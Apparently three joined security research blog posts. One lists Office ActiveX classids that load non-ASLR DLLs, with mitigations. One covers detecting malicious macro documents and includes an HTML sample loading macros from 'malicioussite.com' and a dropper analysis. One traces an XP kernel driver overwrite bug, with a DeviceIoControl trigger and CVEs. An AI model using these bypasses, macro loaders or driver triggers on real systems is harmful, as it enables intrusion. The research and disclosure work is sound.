This is just a short post highlighting how easily ASLR could be bypassed by instantiating ActiveX controls using certain classids in Microsoft Office. I’ve mainly tested with MS Word on an updated Windows 7 32bit with Office 2010 32bit but other applications such as Excel and PowerPoint should work too.

All these classids listed in the below table give security warning prompt but the library will still load before any action is taken.

Library sqlceca35.dll comes with Microsoft SQL Server Compact which is an embedded database that gets installed by Microsoft Office. I’ve seen some systems with version 4.0 installed where sqlceca40.dll has its dynamic bit set and thus gets ASLRed.

C:\Program Files\Microsoft SQL Server Compact Edition\v3.5\sqlceca35.dll
{20347534-760B-464D-B572-285E6B618257} SSCE.Error.3.5
{3018609E-CDBC-47E8-A255-809D46BAA319} SSCE.DropTableListner.3.5
{455C3E04-BFE9-4089-8622-F2464EC3FDDB} SSCE Active Sync Engine.3.5
{7C7E6C99-BB8D-4718-AAA9-70C4320010DE} SSCE.Params.3.5
{8CD1B98D-D8D5-4B51-9564-48B12A98698F} SSCE.RemoteDataAccess.3.5
{9E7E2CCE-3F1F-4891-892C-AC8B486D03B2} SSCE.Params.3.5
{9FD542D2-61C4-4E9F-A8E2-E6B8C7F64CBF} SSCE.Errors.3.5
{A9D3060D-3526-4538-B13A-1913568DAA0D} SSCE.Engine.3.5
{EA91E968-EF93-4FF1-86F3-75CC93416DF2} SSCE.Replication.3.5
C:\Program Files\Microsoft SQL Server Compact Edition\v3.5\sqlceoledb35.dll
{90A1998A-EB21-4F61-872F-F4DFDE1065D6} Microsoft.SQLSERVER.CE.OLEDB.
ErrorLookup.3.5
C:\Program Files\Common Files\System\Ole DB\XMLRW.dll
C:\Program Files\Common Files\System\Ole DB\XMLRWBIN.dll
{10154F28-4979-4166-B114-3E7A7926C747} MSOLAP.4
{867CD778-80D7-4f93-989E-B3E76A92FB42} MSOLAP100ErrorLookup.1
C:\Windows\system32\msvbvm60.dll
{D5DE8D20-5BB8-11D1-A1E3-00A0C90F2731}
C:\Program Files\Common Files\Microsoft Shared\Help\msitss55.dll
C:\Program Files\Common Files\Microsoft Shared\TRANSLAT\FREN\MSB1FREN.DLL
C:\Program Files\Common Files\Microsoft Shared\Help\ITIRCL55.DLL
C:\Program Files\Common Files\Microsoft Shared\TRANSLAT\ESEN\MSB1ESEN.DLL
{5591379C-B467-4BCA-B647-A438712504B0} LR.LexRefTfFunctionProvider.1.0.1
C:\Program Files\Microsoft Sync Framework\v1.0\Runtime\x86\Synchronization.dll
{A7B3B4EE-925C-4D6C-B007-A4A6A0B09143}
C:\Program Files\Microsoft Sync Framework\v1.0\Runtime\x86\FeedSync.dll
{BC0CD90A-2C24-41BE-B6EC-87C15D919418}
C:\Program Files\Common Files\Microsoft Shared\VSTA\8.0\x86\VSTARemotingServer.dll
{60A896CA-1649-45BF-B63F-2E7312A968F0}
C:\Windows\assembly\GAC_MSIL\Microsoft.VisualStudio.Tools.Applications.Blueprints\
8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualStudio.Tools.Applications.Blueprints.dll
{65C52C10-2286-420A-B35C-15CF7F9B5876} Microsoft.VisualStudio.Tools.Applications.
Blueprints.HostControl
C:\Windows\assembly\GAC_MSIL\Microsoft.VisualStudio.Tools.Applications.DesignTime\
8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualStudio.Tools.Applications.DesignTime.dll
{9DA65B6A-813C-4592-9E8A-412C40BBC4B7} Microsoft.VisualStudio.Tools.Applications.
DesignTime.HostAdapter

Some are shown to get rebased as I loaded all libraries in one go but if loaded individually the address should not change.

Taking a look in Office 2010 64bit we still see some do not get ASLRed.

Disabling ActiveX controls in Microsoft Office
Disabling ActiveX controls can be configured via the Trust Center settings

File — Options — Trust Center — Trust Center Settings — ActiveX Settings

This will disable all controls so probably not a good idea in your environment

Disabling specific embedded ActiveX controls with Office kill bit
To enable the Office COM kill bit for a specific control to block a registry key would need to be added with the CLSID of the ActiveX control then add a DWORD value of 0x00000400 to the Compatibility Flags. The location for setting the Office 2010 COM kill bit in the registry is

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common\COM Compatibility

Microsoft EMET
Using EMET we can see all libraries get ASLRed.

Microsoft Office 2013
Finally in Office 2013 the classids that do exist, the libraries that do load have already got there dynamic bit set and get ASLRed

All the documents with these classids can be downloaded from here

For the past few months I have been looking into macro enabled Office documents and during that time I have detected hundreds of malicious documents. This post just highlights what to look out for so it might benefit some of you if deciding to notify or quarantine mail in your environment. I’ve also did a quick analysis on a Word2010 formatted document I received last week.

So what are Macros?
Macros are a series of commands that can be run automatically to perform a task. Macro code is embedded in Office documents written in a programming language known as Visual Basic for Applications (VBA). Macros could be used maliciously to drop malware, download malware, etc. Malicious macro files usually are received in Word documents or Excel spreadsheets but other formats do exist though I have never encountered them. Once a malicious document is opened only a single click is next required for the macro code to run.

Automating Macros
Visual Basic has reserved names for launching code when documents are opened. These names are the key to detect possible malicious code. Sometimes are used for legitimate purposes but generally we should consider them dangerous. For Word the reserved names that could be used maliciously are AutoOpen() and Document_Open() and for Excel the reserved names are Auto_Open() and Workbook_Open(). These days malicious documents are using AutoOpen() and Auto_Open() but Document_Open() and Workbook_Open() could also be used.

Below is an example in Word document where AutoOpen() subroutine is set in Modules-NewMacros

The macros could also be added in the “ThisDocument” section and then NewMacros section is not really required

Similarly in Excel the subroutine Workbook_Open() would be in the “ThisWorkbook” section and the Module1 section is not required

What to look for
Below is a table of the kind of strings to search for based on the extension and file format.

Format Reserved Names Embedded in Extensions
Word 2003 AutoOpen
Document_Open
n/a Doc dot*
Excel 2003 Auto_Open
Workbook_Open
n/a Xls xlt
Word 2010 AutoOpen
Document_Open
vbaProject.bin Docm dotm* doc (renamed)
Excel 2010 Auto_Open
Workbook_Open
vbaProject.bin Xls xlsb xltm

*Only applies when using Document_Open name.

Word 2003 also supports saving macro enabled documents to be saved as XML extension files which are able to run on Word 2010. XML files can also be renamed to a doc extension. The macro code in XML is stored as base64 and the string to search for would be w:macrosPresent=”yes”

Office 2010 format is not a binary format like Office 2003 documents. Office 2010 documents are an Office Open XML (OOXML) format which was introduced with Microsoft Office 2007. Office Open XML is a zipped, XML-based file format so string “vbaProject.bin” would need to be searched in the initial file. Within this vbaProject.bin file the reserved subroutine names will be found.

Couple of months ago a new macro based documents have been seen in the wild. These documents were web page based formatted documents saved as MHT files (Single File Web Page) and then renamed to a doc. Strings you could search for are MIME-Version, Content-Location and x-mso. I have not seen xls extension being used in the wild, most likely because it adds another warning when opened.

When saving macro based documents as HTML files (Web Page) the file extension could be renamed from html to doc or xls. The editdata.mso is a zlib compressed file which contains the macros. The mso file could be called anything so not dependent on this name. If the mso file was to be dropped but some other means the macro document contents would look like this below

<html>
<link rel=Edit-Time-Data href="C:/Temp/editdata.mso">
<body>Will open Windows Calculator to test macros</body>
</html>

If the mso file was to be downloaded remotely an extra warning would be given.

<html>
<link rel=Edit-Time-Data href="http://www.malicioussite.com/editdata.mso">
<body>Will open Windows Calculator to test macros</body>
</html>

 

Malicious Word 2010 Document “email_message.doc” Analysis
I’ve never detected an Office 2010 formatted document till now. Pretty much every document happens to be in Word 2003 format. Below is some quick analysis I did just to highlight the unusual properties taken.

The “email_message.doc” I detected last week sent with a doc extension. Office 2010 macro enabled Word documents by default takes a docm extension. Once this particular malicious document has been opened you’ll see this content

Looking into the macros we see a new technique used to obfuscate its code not seen before (as far as know). In the “NewMacros” section the code can be clearly seen dropping the code then executing it.

We also see pretty much the same code in the “ThisDocument” section.

The line of code of real importance is

dll = Base64Decode(UserForm1.TextBox1)

Here is reads the encoded base64 string from UserForm1.TextBox1 and decodes it before writing to disk and executing it.

Even though the same macro codes are in “ThisDocument” and “NewMacros” section the code in “NewMacros” will not work due to using the reserved macro subroutine name “Document_Open” which only works when used in the “ThisDocument” section.

Final part of the macro code in the malicious document runs a subrountine ClearDocPasteText(“”) which clears the document contents which end up viewing a blank document.

Uploading the Word document to VirusTotal yesterday detected 33/55 and the dropped binary file detected 38/55

Finally some strings in the binary stand out which suggest this malware spams out emails.

00027EB1   0042A2B1      0   MailAddr
00027EBE   0042A2BE      0   reports-2012@qip.ru
00027ED2   0042A2D2      0   SendInBackgr
00027EE0   0042A2E0      0   MailAsSmtpServer
00027EF2   0042A2F2      0   MailAsSmtpClient
00027F04   0042A304      0   UploadViaHttp 
00027F13   0042A313      0   MailViaMapi 
00027F20   0042A320      0   MailViaMailto
00027F2F   0042A32F      0   SmtpServer
00027F3F   0042A33F      0   SmtpPort
00027F4D   0042A34D      0   SmtpAccount
00027F5E   0042A35E      0   SmtpPassword
00027F70   0042A370      0   HttpServer
00027F7F   0042A37F      0   http://repo.int.qip.ru/send
00027F9B   0042A39B      0   HttpPort
00027FA9   0042A3A9      0   HttpAccount
00027FBA   0042A3BA      0   HttpPassword
00027FCC   0042A3CC      0   AttachBugRep 
00027FDA   0042A3DA      0   AttachBugRepFile 
00027FEC   0042A3EC      0   DelBugRepFile 
00027FFB   0042A3FB      0   BugRepSendAs
0002800C   0042A40C      0   bugreport.txt BugRepZip
00028029   0042A429      0   ScrShotDepth
0002803B   0042A43B      0   ScrShotAppOnly 
0002804B   0042A44B      0   ScrShotSendAs
0002805D   0042A45D      0   screenshot.png
0002806C   0042A46C      0   ScrShotZip

References
http://support.microsoft.com/en-us/kb/286310
http://en.wikipedia.org/wiki/Office_Open_XML
http://blog.didierstevens.com/2015/03/09/a-new-type-of-malicious-document-xml/
http://www.howtogeek.com/171993/macros-explained-why-microsoft-office-files-can-be-dangerous/
https://nakedsecurity.sophos.com/2015/03/06/from-the-labs-new-developments-in-microsoft-office-malware/

Last year I started researching into the Windows kernel to get a better understanding of privilege escalation vulnerabilities. Vulnerabilities in the kernel are a serious issue as they could be used to bypass browsers sandboxes and end up compromising the entire system. In general most people assume that security products are developed with security in mind and can be trusted, so I thought I would start my assessment on security products and see how secure they really are from kernel attacks.  Within a couple of months of research six vulnerabilities had already been discovered in various products from different vendors. What was particularly interesting is that they all exhibited the same type of vulnerability, which only seemed to exist on older operating systems.

This blog post details the technical research carried out in order to pinpoint the root cause as to what had changed from Windows XP and Windows Server 2003 to later Windows operating systems.

The vulnerability
The vulnerability exists when drivers do not validate the output buffer address and output buffer size. Applications wanting to talk to the kernel communicate through the use of the DeviceIOControl function.

DeviceIoControl(hDevice, 0x00222000, inbuffer, BUFSIZE, (LPVOID)0xF4F5F6F7, 0, &dwRetBytes, NULL);

In this example we can see two things of interest, first is that using LPVOID we can send in a hardcoded output buffer address and second is the output buffer length has been defined to 0. Sending this to a vulnerable driver will trigger a bugcheck.

Debugger Output
In the bugcheck analysis below the write address is the same as passed through the DeviceIOControl function, which basically means we have found an arbitrary memory overwrite vulnerability. If we look at the call stack, the bugcheck was triggered in function nt!IopCompleteRequest

kd> !analyze -v
***************************************************************************
*                                                                         *
*                        Bugcheck Analysis                                *
*                                                                         *
***************************************************************************

PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced.  This cannot be protected by try-except,
it must be protected by a Probe.  Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: f4f5f6f7, memory referenced.
Arg2: 00000001, value 0 = read operation, 1 = write operation.
Arg3: 804ec09b, If non-zero, the instruction address which referenced the bad memory
	address.
Arg4: 00000000, (reserved)

Debugging Details:
------------------


Could not read faulting driver name

WRITE_ADDRESS:  f4f5f6f7 

FAULTING_IP: 
nt!IopCompleteRequest+92
804ec09b f3a5            rep movs dword ptr es:[edi],dword ptr [esi]

MM_INTERNAL_CODE:  0

CUSTOMER_CRASH_COUNT:  1

DEFAULT_BUCKET_ID:  DRIVER_FAULT

BUGCHECK_STR:  0x50

PROCESS_NAME:  dos_greyhat.exe

IRP_ADDRESS:  86593dd8

DEVICE_OBJECT: 866e10f0

LAST_CONTROL_TRANSFER:  from 804ec11a to 804ec09b

STACK_TEXT:  
f411baec 804ec11a 86593e18 f411bb38 f411bb2c nt!IopCompleteRequest+0x92
f411bb3c 806f5c0e 00000000 00000000 f411bb54 nt!KiDeliverApc+0xb3
f411bb3c 806f00b3 00000000 00000000 f411bb54 hal!HalpApcInterrupt2ndEntry+0x31
f411bbc8 804e53cc 86593e18 86593dd8 00000000 hal!KfLowerIrql+0x43
f411bbe8 804ec134 86593e18 8659f3e0 00000000 nt!KeInsertQueueApc+0x4b
f411bc1c f7e99562 8659f3e0 86594390 86593dd8 nt!IopfCompleteRequest+0x1d8
WARNING: Stack unwind information not available. Following frames may be wrong.
f411bc34 804e3767 866e10f0 867cf288 806f0070 ghhpoc+0x562
f411bc44 805682ab 86593e48 8659f3e0 86593dd8 nt!IopfCallDriver+0x31
f411bc58 805771e2 866e10f0 86593dd8 8659f3e0 nt!IopSynchronousServiceTail+0x70
f411bd00 80579705 000007e8 00000000 00000000 nt!IopXxxControlFile+0x611
f411bd34 804de7f8 000007e8 00000000 00000000 nt!NtDeviceIoControlFile+0x2a
f411bd34 7c90e514 000007e8 00000000 00000000 nt!KiSystemServicePostCall
0012fe3c 00000000 00000000 00000000 00000000 0x7c90e514


STACK_COMMAND:  kb

FOLLOWUP_IP: 
ghhpoc+562
f7e99562 ??              ???

SYMBOL_STACK_INDEX:  6

SYMBOL_NAME:  ghhpoc+562

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: ghhpoc

IMAGE_NAME:  ghhpoc.sys

DEBUG_FLR_IMAGE_TIMESTAMP:  54b18dfe

FAILURE_BUCKET_ID:  0x50_ghhpoc+562

BUCKET_ID:  0x50_ghhpoc+562

Followup: MachineOwner
---------


kd> r
eax=00000008 ebx=86593dd8 ecx=00000002 edx=00000000 esi=867cf288 edi=f4f5f6f7
eip=804ec09b esp=f411baa8 ebp=f411baec iopl=0         nv up ei pl nz na po nc
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010202
nt!IopCompleteRequest+0x92:
804ec09b f3a5            rep movs dword ptr es:[edi],dword ptr [esi]

Vulnerable Driver Analysis
Reverse engineering the driver the bugcheck is triggered after the call of the function IofCompleteRequest.

The IoCompleteRequest function indicates that the driver has completed all processing for a given IRP and is returning the IRP back to the I/O manager. IRP is an I/O request packet and is how Windows communicates with drivers. The IRP data structure contains information used by drivers.

Comparing IRP data
Since the goal was to find the root cause as to why this vulnerability only applies to older versions of Windows, I started comparing Windows XP to Windows 7. Setting a breakpoint before our call to the IoCompleteRequest function and looking at the IRP data in WinDbg, we can see UserBuffer contains the address of our output buffer address. One noticeable change was the “Flags” value. Windows XP had a value of 0x70 whereas Windows 7 had a value of 0x60030

In Windows XP ebx contains pointer to IRP

kd> dt nt!_irp @ebx
   +0x000 Type             : 6
   +0x002 Size             : 0x94
   +0x004 MdlAddress       : (null) 
   +0x008 Flags            : 0x70
   +0x00c AssociatedIrp    : __unnamed
   +0x010 ThreadListEntry  : _LIST_ENTRY [ 0x8650dfb0 - 0x8650dfb0 ]
   +0x018 IoStatus         : _IO_STATUS_BLOCK
   +0x020 RequestorMode    : 1 ''
   +0x021 PendingReturned  : 0 ''
   +0x022 StackCount       : 1 ''
   +0x023 CurrentLocation  : 3 ''
   +0x024 Cancel           : 0 ''
   +0x025 CancelIrql       : 0 ''
   +0x026 ApcEnvironment   : 0 ''
   +0x027 AllocationFlags  : 0xc ''
   +0x028 UserIosb         : 0x0012fe18 _IO_STATUS_BLOCK
   +0x02c UserEvent        : (null) 
   +0x030 Overlay          : __unnamed
   +0x038 CancelRoutine    : (null) 
   +0x03c UserBuffer       : 0xf4f5f6f7 
   +0x040 Tail             : __unnamed

In Windows 7 esi contains pointer to IRP

kd> dt nt!_irp @esi
   +0x000 Type             : 6
   +0x002 Size             : 0x94
   +0x004 MdlAddress       : (null) 
   +0x008 Flags            : 0x60030
   +0x00c AssociatedIrp    : <unnamed-tag>
   +0x010 ThreadListEntry  : _LIST_ENTRY [ 0x85257f94 - 0x85257f94 ]
   +0x018 IoStatus         : _IO_STATUS_BLOCK
   +0x020 RequestorMode    : 1 ''
   +0x021 PendingReturned  : 0 ''
   +0x022 StackCount       : 1 ''
   +0x023 CurrentLocation  : 3 ''
   +0x024 Cancel           : 0 ''
   +0x025 CancelIrql       : 0 ''
   +0x026 ApcEnvironment   : 0 ''
   +0x027 AllocationFlags  : 0x6 ''
   +0x028 UserIosb         : 0x0023f7b8 _IO_STATUS_BLOCK
   +0x02c UserEvent        : (null) 
   +0x030 Overlay          : <unnamed-tag>
   +0x038 CancelRoutine    : (null) 
   +0x03c UserBuffer       : 0xf4f5f6f7 
   +0x040 Tail             : <unnamed-tag>

IoCompleteRequest Analysis
The exported function IoCompleteRequest in ntoskrnl.exe ends up calling IopCompleteRequest function. We can see on Windows XP that it does a bitwise 40 AND 70 and jumps to the inlined memcpy code which ends up triggering the bugcheck.

On Windows 7 we see the bitwise 40 AND 30 takes a different codepath and never hits our memcpy.

The “test al, 40h” instruction on Windows 7 branches off to another codepath as its doing a bitwise 40 AND 30 instead of bitwise 40 AND 70 as al=30h on Windows 7 which is from the IRP flags value.

IopXxxControlFile Analysis
“So what causes the flags value to be 30h instead of 70h?” was my next question. After some investigation I discovered that IopXxxControlFile held the answer. The IopXxxControlFile function had been called earlier in our call stack. This function does a number of checks and validations on the inputs provided such as if addresses are in user space, buffer lengths, etc. and sets up our data in IRP.

In this function near the beginning it calls the ProbeForWrite function which checks if the address falls in the user space range and writable. The first thing the function does though is check the output buffer length, if zero it returns back to the IopXxxControlFile function without even checking the output buffer address. The ProbeForWrite function below is from Windows XP but is also the same for Windows 7.

Returning back to the IopXxxControlFile function and after a number of checks near the end of the code we see our output buffer address being placed in the IRP UserBuffer field and Flags value being updated to 0x70, all it checks on Windows XP if an output buffer address is available.

On Windows 7 we finally discover the root cause as to what has changed in the IopXxxControlFile function. It checks the output buffer length instead of the output buffer address. Since the output buffer length is 0 the flags value does not get set to 0x70 thus mitigating the vulnerability.

What do these flags values mean?
So what do these values 10h, 30h, 40h and 70h represent? Searching through wdm.h header file I found these definitions:

#define IRP_BUFFERED_IO                 0x00000010
#define IRP_DEALLOCATE_BUFFER           0x00000020
#define IRP_INPUT_OPERATION             0x00000040

The values are set in IopXxxControlFile function by performing an OR operation. So doing an OR on IRP_BUFFERED_IO | IRP_DEALLOCATE_BUFFER produces a value of 30h
Converting into code it will look something like this

// Windows XP
Irp->Flags = IRP_BUFFERED_IO | IRP_DEALLOCATE_BUFFER;  
Irp->UserBuffer = pBufferOut;                          
if (pBufferOut) 
  Irp->Flags = IRP_BUFFERED_IO | IRP_DEALLOCATE_BUFFER | IRP_INPUT_OPERATION;
// Windows 7
Irp->Flags = IRP_BUFFERED_IO | IRP_DEALLOCATE_BUFFER;  
Irp->UserBuffer = pBufferOut;                          
if (iBufferOutSize) 
  Irp->Flags = IRP_BUFFERED_IO | IRP_DEALLOCATE_BUFFER | IRP_INPUT_OPERATION;

When it comes to carry its memcpy operation in IoCompleteRequest function it will look something like this

if (Irp->Flags & IRP_BUFFERED_IO)                                   
{                                                                  
  if ((Irp->Flags & IRP_INPUT_OPERATION) 
     &&  (Irp->IoStatus.Status != STATUS_VERIFY_REQUIRED)
     && !(NT_ERROR(Irp->IoStatus.Status)))
  {
       RtlCopyMemory(Irp->UserBuffer, Irp->AssociatedIrp.SystemBuffer, Irp->IoStatus.Information); 
  }
}

Here is it does its bitwise AND operation and dictates its outcome, jump or not to jump.

Conditions of a Vulnerable Driver
During completion of an IRP the I/O Manager copies the data from the system buffer back to the user’s output buffer if using Buffered I/O method (METHOD_BUFFERED) and the status is of a success or warning. The number of bytes to copy is taken from the Irp->IoStatus.Information field.

The following range values indicate error and warning status codes:

  NTSTATUS codes 0xC0000000 – 0xFFFFFFFF are errors
  NTSTATUS codes 0x80000000 – 0xBFFFFFFF are warnings

In the above code we can see it uses the macro NT_ERROR() to evaluate if not an error status.

So if the data is too large for the buffer, the driver completes the IRP with a status STATUS_BUFFER_OVERFLOW (0x80000005), which falls in the warning range, and the Irp->IoStatus.Information will be updated with the buffer size and data copied over. If completed with status STATUS_BUFFER_TOO_SMALL (0xC0000023) which falls in the error range, the I/O Manager does not copy any data back to the output buffer as it sets the Irp->IoStatus.Information to 0.

To reproduce a vulnerable driver for testing purposes use this code in your dispatch routine for Buffered I/O. The IoStatus.Information value has to be 1 or more for an overwrite to take place.

Irp->IoStatus.Information = 4;
Irp->IoStatus.Status = STATUS_SUCCESS;
IoCompleteRequest(Irp, IO_NO_INCREMENT);

Windows supports three I/O transfer methods, which the driver developer can use for reading and writing data to memory. One method being Buffered I/O where the I/O Manager allocates a system buffer of equal size to the users inputted buffer. For write operations, the I/O manager copies the user’s buffer data into the system buffer. For read operations, the I/O manager copies data from the system buffer to the users output buffer when the IRP completes and then frees the system buffer. Buffered I/O is defined in the driver for example like this

CTL_CODE(FILE_DEVICE_UNKNOWN, 0x800, METHOD_BUFFERED, FILE_ANY_ACCESS)

So when using METHOD_BUFFERED it copies our system data back to our UserBuffer address when IRP is completed using the IoCompleteRequest function.

Fixing a Vulnerable Driver
Asking the same question to all the vendors on how they each fixed the issue it was interesting to find different approaches had been taken. One approach was

to check if the output buffer address was in the user space

if (Irp->UserBuffer > MmHighestUserAddress)
{
    ntStatus = STATUS_INVALID_PARAMETER;
}

Another approach was to check the size of the output buffer

if (iBufferOutSize < sizeof(ULONG))
{
    ntStatus = STATUS_INVALID_BUFFER_SIZE;
}

Depending on the dispatch conditions just by changing the status value to an error status is enough to resolve the vulnerability.

I would like to thank BullGuard, AVG and K7 Computing for kindly sharing information. A special thanks to BullGuard as they were very helpful and provided a lot more important information which saved me a lot of time on this research. I can’t say the same for the other three vendors: McAfee, Symantec and TrendMicro. All three decided not to share anything; do you see anything confidential in the above code?

Published Advisories
This table below provides information on the products where this vulnerability had been discovered.

Vendor Product OSVDB CVE ID Days Vendor link
McAfee Data Loss Prevention 117345 CVE-2015-1305 99 Advisory
Trend Micro Antivirus Plus
Internet Security
Maximum Security
115514 CVE-2014-9641 70 Advisory
Symantec Altiris Client 116082 CVE-2014-7286 59 Advisory
AVG Internet Security 113824 CVE-2014-9632 26 Release notes
K7 Computing Ultimate Security
Anti-Virus Plus
Total Security
113007 CVE-2014-9643 22 None
BullGuard Antivirus
Internet Security
Premium Protection
Online Backup
114478 CVE-2014-9642 16 Release notes

Advisories published by some vendors were very unprofessional. Trend Micro had to be advised to correct their description, as they didn’t get it right the first time since it had a number of mistakes and was initially published without consultation. Also the fix applies all the way to Trend Titanium products 2015, which was stated in my vulnerability report but not mentioned in their advisory.

For Symantec, well they are not any better. After waiting nearly two months they ended up releasing an advisory advising only to uninstall the driver. Also, their advisory link in their mitigation information section refers to a knowledge base article DOC7993 on how to remove the driver. However, if you take a look as this article it starts off mentioning the MQAC.sys driver and points to a Microsoft link. I had this flagged at the time but no action has been taken. It’s a similar vulnerability so they must have just copied and pasted it without reading it.

What is really shocking is that McAfee took 99 days to release an advisory to the public whereas BullGuard took only 16 days. Does that mean if an exploit was made public we would have had to wait 99 days for an update? Also, McAfee failed to mention in their advisory that it also affects Windows Server 2003, which was clearly stated in my vulnerability report as the product is supported on Windows Server 2003. I however did not test it on Windows Server 2003 R2 (32bit) but did reverse engineer ntoskrnl.exe from Windows Server 2003 R2 (64bit) and did have only the address check in the IopXxxControlFile function. There is a 64bit version for McAfee DLP so should be exploitable too.

Other Vendors
Assessment carried out on some of the security vendors’ products that were not affected from this type of vulnerability are listed below. This is no way an assurance that their products are free from this vulnerability, as there is a possibility some ioctls may have been missed, input buffer sizes may have changed the codepath, device handles not loaded, etc.

  • Agnitum
  • AhnLab
  • Avast
  • Avira
  • BitDefender
  • ClamAV
  • Comodo
  • Emsisoft
  • Eset
  • Fortinet
  • FRISK Software
  • F-Secure
  • G Data
  • Kaspersky Lab
  • Kingsoft
  • Malwarebytes
  • Nano Security
  • Norman
  • Panda Security
  • Sophos
  • TrustPort
  • ThreatTrack Security
  • Webroot
  • Zemana

Other Windows Versions
Since all my tests were on a fully patched Windows XP SP3 32bit and Windows 7 SP1 32bit I thought I’d check some other operating systems. Checking on Windows Server 2003 SP2 Standard Edition 32bit found to have the same issue as Windows XP and during tests exploited successfully. Windows Server 2003 has still got over 5 months before the end-of-life so for those of you still using Windows 2003 better upgrade to a later operating system if you’ve not already done so.

On a clean default installation of Windows Vista 32bit in an unpatched state the output buffer length check had been applied like Windows 7. This means Microsoft did know about this issue and added the check before release.

There are plenty of products designed only to run on Windows Servers, which I have not audited, so maybe it’s a good time for researchers to discover some low-hanging fruit.

Final thoughts
One thing is clear from this research and working with vendors: Just because it’s a big company doesn’t mean you’ll get great service. There are plenty of other vendors doing an excellent job so we should not blindly need to go with the likes of McAfee, Symantec or Trend Micro.

Updating machines is a tedious job at times so really we should be focusing on mitigation products like Microsoft EMET and MalwareBytes Anti-Exploit and not be so dependent on constantly updating machines for security. Bottom line is to upgrade to the latest operating systems as it will have a number of mitigations, checks, validations in place that we probably don’t even know about yet keeping us safe.

 

I’ll start submitting the exploits to Exploit-DB in the next few days and tweet you all once published.

References
http://msdn.microsoft.com/en-us/library/ff550694(v=VS.85).aspx
http://msdn.microsoft.com/en-gb/library/cc704588.aspx
http://msdn.microsoft.com/en-us/library/ff545693.aspx
http://msdn.microsoft.com/en-us/library/windows/hardware/ff548649(v=vs.85).aspx
http://doxygen.reactos.org/d6/dfc/ntoskrnl_2io_2iomgr_2irp_8c_source.html
http://www.cmlab.csie.ntu.edu.tw/~cathyp/eBooks/WindowsNT/Driver/IRPs.pdf  [PDF]
http://www.tutorialspoint.com/assembly_programming/assembly_logical_instructions.htm
http://blogs.msdn.com/b/doronh/archive/2006/12/12/how-to-return-the-number-of-bytes-required-for-a-subsequent-operation.aspx